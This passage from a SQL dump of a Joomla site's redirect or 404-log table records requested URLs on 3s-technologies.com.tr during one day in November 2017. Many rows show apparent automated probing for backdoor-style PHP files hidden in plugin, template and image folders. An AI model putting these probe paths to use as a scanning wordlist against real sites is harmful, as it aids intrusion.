00:00:00',301),(14542,'http://3s-technologies.com.tr/en/components/com_docman/views/docman/config.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:53:18','0000-00-00 00:00:00',301),(14543,'http://3s-technologies.com.tr/en/components/com_poll/views/languages.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:53:30','0000-00-00 00:00:00',301),(14544,'http://3s-technologies.com.tr/en/libraries/joomla/filter/class-library.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:53:30','0000-00-00 00:00:00',301),(14545,'http://3s-technologies.com.tr/en/libraries/openid/auth/components.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:53:31','0000-00-00 00:00:00',301),(14546,'http://3s-technologies.com.tr/en/components/com_contact/elements/menus.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:53:47','0000-00-00 00:00:00',301),(14547,'http://3s-technologies.com.tr/en/components/com_weblinks/models/class-library.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:53:58','0000-00-00 00:00:00',301),(14548,'http://3s-technologies.com.tr/en/plugins/autogrow/components.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:54:03','0000-00-00 00:00:00',301),(14549,'http://3s-technologies.com.tr/en/components/com_banners/models/cache.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:54:06','0000-00-00 00:00:00',301),(14550,'http://3s-technologies.com.tr/en/templates/templates/include.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:54:07','0000-00-00 00:00:00',301),(14551,'http://3s-technologies.com.tr/en/templates/ja_larix/scripts/common.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:54:09','0000-00-00 00:00:00',301),(14552,'http://3s-technologies.com.tr/en/libraries/fof/form/field/include.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:54:14','0000-00-00 00:00:00',301),(14553,'http://3s-technologies.com.tr/en/templates/edemco/configure.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:54:16','0000-00-00 00:00:00',301),(14554,'http://3s-technologies.com.tr/en/plugins/authntication/menus.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:54:17','0000-00-00 00:00:00',301),(14555,'http://3s-technologies.com.tr/en/components/com_contact/views/category/components.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:54:18','0000-00-00 00:00:00',301),(14556,'http://3s-technologies.com.tr/en/libraries/joomla/admin-class.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:54:27','0000-00-00 00:00:00',301),(14557,'http://3s-technologies.com.tr/en/plugins/authentication/config.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:54:34','0000-00-00 00:00:00',301),(14558,'http://3s-technologies.com.tr/en/images/senturk/yurt/thumbs/settings.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:54:38','0000-00-00 00:00:00',301),(14559,'http://3s-technologies.com.tr/en/templates/ja_larix/scripts/languages.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:54:42','0000-00-00 00:00:00',301),(14560,'http://3s-technologies.com.tr/en/libraries/joomla/language/stemmer/languages.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:54:53','0000-00-00 00:00:00',301),(14561,'http://3s-technologies.com.tr/en/libraries/pattemplate/pattemplate/dump/include.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:55:00','0000-00-00 00:00:00',301),(14562,'http://3s-technologies.com.tr/en/libraries/joomla/document/feed/settings.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:55:11','0000-00-00 00:00:00',301),(14563,'http://3s-technologies.com.tr/en/templates/vt_carrepair/html/com_users/reset/menus.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:55:14','0000-00-00 00:00:00',301),(14564,'http://3s-technologies.com.tr/en/components/com_wrapper/class-library.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:55:19','0000-00-00 00:00:00',301),(14565,'http://3s-technologies.com.tr/en/templates/hathor/html/com_postinstall/config.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:55:31','0000-00-00 00:00:00',301),(14566,'http://3s-technologies.com.tr/en/includes/js/calendar/class-library.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:55:45','0000-00-00 00:00:00',301),(14567,'http://3s-technologies.com.tr/en/plugins/k2/incptvk2imagegallery-original/incptvk2imagegallery/tmpl/galleria/css/class-library.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:55:52','0000-00-00 00:00:00',301),(14568,'http://3s-technologies.com.tr/en/modules/mod_khuyenmai/scripts/settings.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:56:04','0000-00-00 00:00:00',301),(14569,'http://3s-technologies.com.tr/en/templates/system/config.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:56:04','0000-00-00 00:00:00',301),(14570,'http://3s-technologies.com.tr/en/media/k2/galleries/23/admin.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:56:10','0000-00-00 00:00:00',301),(14571,'http://3s-technologies.com.tr/en/components/com_phocaguestbook/assets/library/standalone/htmlpurifier/language/messages/components.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:56:12','0000-00-00 00:00:00',301),(14572,'http://3s-technologies.com.tr/en/modules/mod_sections/tmpl/common.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:56:17','0000-00-00 00:00:00',301),(14573,'http://3s-technologies.com.tr/en/plugins/system/jarvis/tmpl/blocks/languages.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:56:21','0000-00-00 00:00:00',301),(14574,'http://3s-technologies.com.tr/en/libraries/joomla/html/parameter/element/common.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:56:22','0000-00-00 00:00:00',301),(14575,'http://3s-technologies.com.tr/en/components/com_content/views/categories/admin.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:56:23','0000-00-00 00:00:00',301),(14576,'http://3s-technologies.com.tr/en/components/com_akeeba/controllers/configure.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:56:57','0000-00-00 00:00:00',301),(14577,'http://3s-technologies.com.tr/en/plugins/audio/images/cache.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:56:58','0000-00-00 00:00:00',301),(14578,'http://3s-technologies.com.tr/en/libraries/xml/help/admin-class.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:57:01','0000-00-00 00:00:00',301),(14579,'http://3s-technologies.com.tr/en/components/com_mailto/views/sent/settings.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:57:05','0000-00-00 00:00:00',301),(14580,'http://3s-technologies.com.tr/en/plugins/k2/incptvk2imagegallery-original/incptvk2imagegallery/tmpl/galleria/css/languages.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:57:18','0000-00-00 00:00:00',301),(14581,'http://3s-technologies.com.tr/en/templates/system/images/admin.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:57:28','0000-00-00 00:00:00',301),(14582,'http://3s-technologies.com.tr/en/media/mailto/cache.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:57:43','0000-00-00 00:00:00',301),(14583,'http://3s-technologies.com.tr/en/libraries/joomla/utilities/languages.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:57:46','0000-00-00 00:00:00',301),(14584,'http://3s-technologies.com.tr/en/modules/mod_megahorizontalscroller/assets/images/config.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:57:50','0000-00-00 00:00:00',301),(14585,'http://3s-technologies.com.tr/en/plugins/common.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:57:51','0000-00-00 00:00:00',301),(14586,'http://3s-technologies.com.tr/en/plugins/tmp/class-library.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:58:00','0000-00-00 00:00:00',301),(14587,'http://3s-technologies.com.tr/en/libraries/pear/archive_tar/configure.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:58:10','0000-00-00 00:00:00',301),(14588,'http://3s-technologies.com.tr/en/components/com_virtuemart/js/extjs/images/common.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:58:17','0000-00-00 00:00:00',301),(14589,'http://3s-technologies.com.tr/en/components/com_user/cache.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:58:20','0000-00-00 00:00:00',301),(14590,'http://3s-technologies.com.tr/en/media/editors/codemirror/mode/clike/languages.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:58:22','0000-00-00 00:00:00',301),(14591,'http://3s-technologies.com.tr/en/components/com_weblinks/views/category/languages.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:58:24','0000-00-00 00:00:00',301),(14592,'http://3s-technologies.com.tr/en/libraries/openid/auth/yadis/menus.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:58:31','0000-00-00 00:00:00',301),(14593,'http://3s-technologies.com.tr/en/libraries/tcpdf/cache/admin-class.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:58:39','0000-00-00 00:00:00',301),(14594,'http://3s-technologies.com.tr/en/libraries/phputf8/mbstring/common.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:58:56','0000-00-00 00:00:00',301),(14595,'http://3s-technologies.com.tr/en/libraries/fof/model/field/common.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:58:57','0000-00-00 00:00:00',301),(14596,'http://3s-technologies.com.tr/en/templates/mega_ethan/html/com_content/menus.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:58:58','0000-00-00 00:00:00',301),(14597,'http://3s-technologies.com.tr/en/components/com_virtuemart/js/extjs2/images/gray/qtip/include.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:59:11','0000-00-00 00:00:00',301),(14598,'http://3s-technologies.com.tr/en/libraries/joomla/feed/parser/rss/common.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:59:21','0000-00-00 00:00:00',301),(14599,'http://3s-technologies.com.tr/en/media/editors/codemirror/mode/haskell-literate/admin.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:59:22','0000-00-00 00:00:00',301),(14600,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by?language=en-gb&product_name/dirdesc',NULL,'','',1,0,'2017-11-29 08:59:29','0000-00-00 00:00:00',301),(14601,'http://3s-technologies.com.tr/en/libraries/joomla/registry/class-library.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:59:31','0000-00-00 00:00:00',301),(14602,'http://3s-technologies.com.tr/en/plugins/content/pagenavigation/tmpl/class-library.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:59:37','0000-00-00 00:00:00',301),(14603,'http://3s-technologies.com.tr/en/modules/mod_megahorizontalscroller/include.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 08:59:38','0000-00-00 00:00:00',301),(14604,'http://3s-technologies.com.tr/en/templates/ot_dulcet/language/en-gb/common.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:00:00','0000-00-00 00:00:00',301),(14605,'http://3s-technologies.com.tr/en/plugins/advhr/jscripts/settings.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:00:17','0000-00-00 00:00:00',301),(14606,'http://3s-technologies.com.tr/en/components/com_weblinks/models/admin.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:00:21','0000-00-00 00:00:00',301),(14607,'http://3s-technologies.com.tr/en/plugins/fullpage/css/components.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:00:23','0000-00-00 00:00:00',301),(14608,'http://3s-technologies.com.tr/en/components/com_contact/views/categories/tmpl/settings.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:00:39','0000-00-00 00:00:00',301),(14609,'http://3s-technologies.com.tr/en/plugins/styles/admin.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:00:48','0000-00-00 00:00:00',301),(14610,'http://3s-technologies.com.tr/en/libraries/joomla/filesystem/configure.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:00:54','0000-00-00 00:00:00',301),(14611,'http://3s-technologies.com.tr/en/modules/mod_breadcrumbs/common.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:01:01','0000-00-00 00:00:00',301),(14612,'http://3s-technologies.com.tr/en/includes/js/dtree/img/include.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:01:02','0000-00-00 00:00:00',301),(14613,'http://3s-technologies.com.tr/en/modules/mod_newsflash/tmpl/common.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:01:17','0000-00-00 00:00:00',301),(14614,'http://3s-technologies.com.tr/en/modules/mod_parallaxslider/tmpl/include.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:01:23','0000-00-00 00:00:00',301),(14615,'http://3s-technologies.com.tr/en/modules/mod_k2_comments/settings.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:01:31','0000-00-00 00:00:00',301),(14616,'http://3s-technologies.com.tr/en/templates/mega_ethan/class-library.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:01:31','0000-00-00 00:00:00',301),(14617,'http://3s-technologies.com.tr/en/plugins/table/classes/common.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:01:34','0000-00-00 00:00:00',301),(14618,'http://3s-technologies.com.tr/en/media/editors/codemirror/mode/turtle/config.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:01:34','0000-00-00 00:00:00',301),(14619,'http://3s-technologies.com.tr/en/plugins/user/joomla/cache.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:01:51','0000-00-00 00:00:00',301),(14620,'http://3s-technologies.com.tr/en/libraries/cms/table/common.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:01:53','0000-00-00 00:00:00',301),(14621,'http://3s-technologies.com.tr/en/templates/siteground-j16-15/html/configure.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:01:59','0000-00-00 00:00:00',301),(14622,'http://3s-technologies.com.tr/en/media/com_b2jcontact/images/config.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:02:03','0000-00-00 00:00:00',301),(14623,'http://3s-technologies.com.tr/en/images/senturk/yemek/config.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:02:10','0000-00-00 00:00:00',301),(14624,'http://3s-technologies.com.tr/en/modules/mod_megahorizontalscroller/languages/include.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:02:24','0000-00-00 00:00:00',301),(14625,'http://3s-technologies.com.tr/en/components/com_contact/views/contact/tmpl/include.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:02:37','0000-00-00 00:00:00',301),(14626,'http://3s-technologies.com.tr/en/plugins/system/jcemediabox/themes/squeeze/settings.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:02:37','0000-00-00 00:00:00',301),(14627,'http://3s-technologies.com.tr/en/templates/beez3/javascript/admin-class.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:02:38','0000-00-00 00:00:00',301),(14628,'http://3s-technologies.com.tr/en/plugins/system/legacy/menus.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:02:42','0000-00-00 00:00:00',301),(14629,'http://3s-technologies.com.tr/en/libraries/joomla/table/configure.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:02:52','0000-00-00 00:00:00',301),(14630,'http://3s-technologies.com.tr/en/libraries/joomla/utilities/admin.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:02:55','0000-00-00 00:00:00',301),(14631,'http://3s-technologies.com.tr/en/modules/mod_newsflash/tmpl/components.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:03:02','0000-00-00 00:00:00',301),(14632,'http://3s-technologies.com.tr/en/templates/theme1882/html/com_users/remind/components.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:03:03','0000-00-00 00:00:00',301),(14633,'http://3s-technologies.com.tr/en/libraries/joomla/model/components.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:03:08','0000-00-00 00:00:00',301),(14634,'http://3s-technologies.com.tr/en/components/com_user/views/user/languages.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:03:08','0000-00-00 00:00:00',301),(14635,'http://3s-technologies.com.tr/en/templates/system/images/include.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:03:13','0000-00-00 00:00:00',301),(14636,'http://3s-technologies.com.tr/en/plugins/system/shinetheme/assets/fonts/nexa/specimen_files/cache.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:03:13','0000-00-00 00:00:00',301),(14637,'http://3s-technologies.com.tr/en/components/com_jumi/module/language/include.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:03:14','0000-00-00 00:00:00',301),(14638,'http://3s-technologies.com.tr/en/components/com_search/views/search/tmpl/menus.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:03:24','0000-00-00 00:00:00',301),(14639,'http://3s-technologies.com.tr/en/modules/mod_poll/tmpl/admin.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:03:28','0000-00-00 00:00:00',301),(14640,'http://3s-technologies.com.tr/en/libraries/classes/config.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:03:29','0000-00-00 00:00:00',301),(14641,'http://3s-technologies.com.tr/en/plugins/authentication/configure.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:03:41','0000-00-00 00:00:00',301),(14642,'http://3s-technologies.com.tr/en/components/com_jce/editor/extensions/aggregator/dailymotion/js/configure.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:03:56','0000-00-00 00:00:00',301),(14643,'http://3s-technologies.com.tr/en/media/editors/codemirror/mode/markdown/admin-class.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:03:58','0000-00-00 00:00:00',301),(14644,'http://3s-technologies.com.tr/en/plugins/editors/tinymce/jscripts/tiny_mce/themes/simple/images/settings.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:04:22','0000-00-00 00:00:00',301),(14645,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name?language=en-gb',NULL,'','',8,0,'2017-11-29 09:04:23','0000-00-00 00:00:00',301),(14646,'http://3s-technologies.com.tr/en/media/editors/codemirror/mode/django/class-library.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:04:43','0000-00-00 00:00:00',301),(14647,'http://3s-technologies.com.tr/en/libraries/joomla/event/config.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:04:43','0000-00-00 00:00:00',301),(14648,'http://3s-technologies.com.tr/en/modules/mod_productscroller/configure.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:04:46','0000-00-00 00:00:00',301),(14649,'http://3s-technologies.com.tr/en/plugins/contextmenu/components.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:05:08','0000-00-00 00:00:00',301),(14650,'http://3s-technologies.com.tr/en/components/com_jce/editor/extensions/mediaplayer/jceplayer/tmpl/config.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:06:32','0000-00-00 00:00:00',301),(14651,'http://3s-technologies.com.tr/en/templates/beez_20/images/nature/admin-class.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:06:40','0000-00-00 00:00:00',301),(14652,'http://3s-technologies.com.tr/en/plugins/zoom/admin.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:07:04','0000-00-00 00:00:00',301),(14653,'http://3s-technologies.com.tr/en/components/com_xmap/views/html/tmpl/admin-class.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:07:16','0000-00-00 00:00:00',301),(14654,'http://3s-technologies.com.tr/en/components/com_user/views/register/tmpl/include.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:07:47','0000-00-00 00:00:00',301),(14655,'http://3s-technologies.com.tr/en/libraries/joomla/application/menus.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:08:08','0000-00-00 00:00:00',301),(14656,'http://3s-technologies.com.tr/en/modules/mod_artsexylightbox/artsexylightbox/images/white/configure.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:08:17','0000-00-00 00:00:00',301),(14657,'http://3s-technologies.com.tr/en/plugins/content/jw_sigpro/jw_sigpro/includes/js/jquery_slimbox/css/common.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:09:26','0000-00-00 00:00:00',301),(14658,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,pc.ordering,product_name/results,1-100',NULL,'','',3,0,'2017-11-29 09:11:10','0000-00-00 00:00:00',301),(14659,'http://3s-technologies.com.tr/en/plugins/template/admin.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:11:38','0000-00-00 00:00:00',301),(14660,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by?category_name/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-29 09:15:09','0000-00-00 00:00:00',301),(14661,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-29 09:23:37','0000-00-00 00:00:00',301),(14662,'http://3s-technologies.com.tr/en/modules/mod_simpleemailform/index.html',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 09:23:40','0000-00-00 00:00:00',301),(14663,'http://3s-technologies.com.tr/tr/anasayfa/78-turkish-tr',NULL,'','',31,0,'2017-11-29 09:33:38','0000-00-00 00:00:00',301),(14664,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name',NULL,'','',596,0,'2017-11-29 09:37:29','0000-00-00 00:00:00',301),(14665,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc',NULL,'','',586,0,'2017-11-29 09:37:46','0000-00-00 00:00:00',301),(14666,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,ordering',NULL,'','',562,0,'2017-11-29 09:38:45','0000-00-00 00:00:00',301),(14667,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',560,0,'2017-11-29 09:39:19','0000-00-00 00:00:00',301),(14668,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2017-11-29 09:40:03','0000-00-00 00:00:00',301),(14669,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name',NULL,'','',584,0,'2017-11-29 09:40:17','0000-00-00 00:00:00',301),(14670,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name',NULL,'','',409,0,'2017-11-29 09:44:00','0000-00-00 00:00:00',301),(14671,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme',NULL,'','',88,0,'2017-11-29 09:56:09','0000-00-00 00:00:00',301),(14672,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-29 09:57:44','0000-00-00 00:00:00',301),(14673,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-29 10:01:05','0000-00-00 00:00:00',301),(14674,'https://www.3s-technologies.com.tr/en/products/manufacturer/screen-printer/by,`p`.product_sku',NULL,'','',1,0,'2017-11-29 10:03:50','0000-00-00 00:00:00',301),(14675,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-29 10:04:24','0000-00-00 00:00:00',301),(14676,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim',NULL,'','',21,0,'2017-11-29 10:11:31','0000-00-00 00:00:00',301),(14677,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,product_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-29 10:16:23','0000-00-00 00:00:00',301),(14678,'https://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by?`p`.product_sku/dirdesc&error=404&language=en-gb',NULL,'','',1,0,'2017-11-29 10:26:32','0000-00-00 00:00:00',301),(14679,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name/dirdesc/results,1-40',NULL,'','',1,0,'2017-11-29 10:38:08','0000-00-00 00:00:00',301),(14680,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-29 10:44:24','0000-00-00 00:00:00',301),(14681,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_fl_250x250.png',NULL,'','',1,0,'2017-11-29 11:04:24','0000-00-00 00:00:00',301),(14682,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',15,0,'2017-11-29 11:11:16','0000-00-00 00:00:00',301),(14683,'http://3s-technologies.com.tr/index.php/en/products/stencil-washer-eco-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-11-29 11:14:43','0000-00-00 00:00:00',301),(14684,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name/dirdesc/results,1-20',NULL,'','',1,0,'2017-11-29 11:18:46','0000-00-00 00:00:00',301),(14685,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',12,0,'2017-11-29 11:29:53','0000-00-00 00:00:00',301),(14686,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/asp-300-detail',NULL,'','',18,0,'2017-11-29 11:36:04','0000-00-00 00:00:00',301),(14687,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,mf_name/results,1-10',NULL,'','',16,0,'2017-11-29 11:47:48','0000-00-00 00:00:00',301),(14688,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-29 11:53:37','0000-00-00 00:00:00',301),(14689,'http://3s-technologies.com.tr/index.php/en/products/zero-ion-g3-detail?tmpl=component&print=1',NULL,'','',9,0,'2017-11-29 11:55:07','0000-00-00 00:00:00',301),(14690,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku',NULL,'','',1,0,'2017-11-29 11:59:25','0000-00-00 00:00:00',301),(14691,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,product_name',NULL,'','',47,0,'2017-11-29 12:05:13','0000-00-00 00:00:00',301),(14692,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta',NULL,'','',1,0,'2017-11-29 12:07:39','0000-00-00 00:00:00',301),(14693,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/mx200lp-detail/askquestion?tmpl=component',NULL,'','',205,0,'2017-11-29 12:21:02','0000-00-00 00:00:00',301),(14694,'http://www.3s-technologies.com.tr/index.php/en/products/stencil-washer-eco-detail?tmpl=component&print=1',NULL,'','',27,0,'2017-11-29 12:37:10','0000-00-00 00:00:00',301),(14695,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/e-bar-26-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-29 12:38:37','0000-00-00 00:00:00',301),(14696,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/results,1-40',NULL,'','',3,0,'2017-11-29 12:40:03','0000-00-00 00:00:00',301),(14697,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-29 12:43:24','0000-00-00 00:00:00',301),(14698,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer?language=en-gb',NULL,'','',23,0,'2017-11-29 12:47:25','0000-00-00 00:00:00',301),(14699,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',23,0,'2017-11-29 12:51:23','0000-00-00 00:00:00',301),(14700,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-29 12:51:43','0000-00-00 00:00:00',301),(14701,'http://3s-technologies.com.tr/en/products/thru-hole/by,product_sku',NULL,'','',14,0,'2017-11-29 12:54:05','0000-00-00 00:00:00',301),(14702,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/by,category_name',NULL,'','',428,0,'2017-11-29 13:10:00','0000-00-00 